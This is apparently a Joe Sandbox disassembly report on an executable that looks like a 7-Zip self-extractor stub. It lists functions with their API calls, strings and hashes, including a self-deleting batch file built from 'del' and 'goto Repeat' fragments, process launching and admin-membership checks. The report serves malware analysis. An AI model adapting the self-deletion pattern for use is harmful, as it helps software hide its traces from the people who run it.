GetCurrentThreadId.KERNEL32 ref: 00408669
SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
EndDialog.USER32(?,00000000), ref: 0040869A

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C

Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
FreeSid.ADVAPI32(?), ref: 004024A2

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69

Function 0040AD30 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA

Function 00413D43 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255

Function 00413370 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D

Function 004139D1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0

Function 00413AAB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794

Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D

Strings

" -, xrefs: 0040508A
sfxwaitall, xrefs: 00405085

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 2734624574-3991362806
Opcode ID: 63930edcd67e25ccf09d7e43436606dce1ade80320862e26f9056340c9b1cd63
Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
Opcode Fuzzy Hash: 63930edcd67e25ccf09d7e43436606dce1ade80320862e26f9056340c9b1cd63
Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68

Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
CloseHandle.KERNEL32(00419858), ref: 00405445
SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7

Strings

", xrefs: 004053BE, 004053C3, 00405407
open, xrefs: 00405468
7ZSfx%03x.cmd, xrefs: 0040535D
if exist ", xrefs: 004053CC
:Repeat, xrefs: 00405397
" goto Repeat, xrefs: 004053E5
del ", xrefs: 004053A4, 004053A9, 004053F2

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 024ca1496686e6a438e05d5d6dd2e21180d542993e08a8bf41a3ecf294dc3b55
Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
Opcode Fuzzy Hash: 024ca1496686e6a438e05d5d6dd2e21180d542993e08a8bf41a3ecf294dc3b55
Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68

Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403140
lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
GetWindowLongW.USER32(?,000000F0), ref: 00403160

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
GetParent.USER32(?), ref: 0040319B
LoadLibraryA.KERNEL32(riched20), ref: 004031AF
GetMenu.USER32(?), ref: 004031C2
SetThreadLocale.KERNEL32(00000419), ref: 004031CF
CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
DestroyWindow.USER32(?), ref: 00403210
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
GetSysColor.USER32(0000000F), ref: 00403229
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F

Strings

RichEdit20W, xrefs: 004031F9
{\rtf, xrefs: 00403176
STATIC, xrefs: 0040314A
riched20, xrefs: 004031AA

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: e102d8aa265157ceba963917365e781f2d4fd1c47071781b891979077b6edaf4
Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
Opcode Fuzzy Hash: e102d8aa265157ceba963917365e781f2d4fd1c47071781b891979077b6edaf4
Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68

Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
LoadIconW.USER32(00000000), ref: 00408717
GetSystemMetrics.USER32(00000032), ref: 0040872B
GetSystemMetrics.USER32(00000031), ref: 00408730
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
LoadImageW.USER32(00000000), ref: 0040873C
SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
GetDlgItem.USER32(?,000004B2), ref: 00408781
GetDlgItem.USER32(?,000004B2), ref: 0040878B
GetWindowLongW.USER32(?,000000F0), ref: 00408797
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
GetDlgItem.USER32(?,000004B5), ref: 004087B4
GetDlgItem.USER32(?,000004B5), ref: 004087C2
GetWindowLongW.USER32(?,000000F0), ref: 004087CE
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
GetWindow.USER32(?,00000005), ref: 004088C3
GetWindow.USER32(?,00000005), ref: 004088DF
GetWindow.USER32(?,00000005), ref: 004088F7
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
LoadIconW.USER32(00000000), ref: 0040895E
GetDlgItem.USER32(?,000004B1), ref: 0040897D
SendMessageW.USER32(00000000), ref: 00408980

Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 3694754696-0
Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E

Function 00404B06 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(025649B0,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(025649B0), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

_wtol.MSVCRT ref: 00404CDF
_wtol.MSVCRT ref: 00404CFB

Strings

ExtractPathText, xrefs: 00404D1C
MiscFlags, xrefs: 00404C74, 00404C79, 00404C95
ExtractDialogText, xrefs: 00404CB0
ExtractPathTitle, xrefs: 00404D04
ExtractTitle, xrefs: 00404BB2
OverwriteMode, xrefs: 00404C24
WarningTitle, xrefs: 00404B9A
Progress, xrefs: 00404BCA
ExtractDialogWidth, xrefs: 00404CC1
ErrorTitle, xrefs: 00404B82
ExtractPathWidth, xrefs: 00404CE8
CancelPrompt, xrefs: 00404D34
ExtractCancelText, xrefs: 00404CA4
GUIMode, xrefs: 00404BF7
Title, xrefs: 00404B14
GUIFlags, xrefs: 00404C41, 00404C46, 00404C62

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
API String ID: 2725485552-1675048025
Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D

Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401EBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
GetObjectW.GDI32(?,00000018,?), ref: 00401F12
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
CreateCompatibleDC.GDI32(?), ref: 00401F35
CreateCompatibleDC.GDI32(?), ref: 00401F3C
SelectObject.GDI32(00000000,?), ref: 00401F4A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
SelectObject.GDI32(00000000,00000000), ref: 00401F60
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
SelectObject.GDI32(00000000,?), ref: 00401F9D
SelectObject.GDI32(00000000,?), ref: 00401FA3
DeleteDC.GDI32(00000000), ref: 00401FAC
DeleteDC.GDI32(00000000), ref: 00401FAF
ReleaseDC.USER32(00000000,?), ref: 00401FB6
ReleaseDC.USER32(00000000,?), ref: 00401FC5
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4

Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
GetWindowLongW.USER32(?,000000F0), ref: 00402019
GetMenu.USER32(?), ref: 0040202E

Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
CoInitialize.OLE32(00000000), ref: 00402076
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
GlobalFree.KERNEL32(00000000), ref: 004020B7

Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
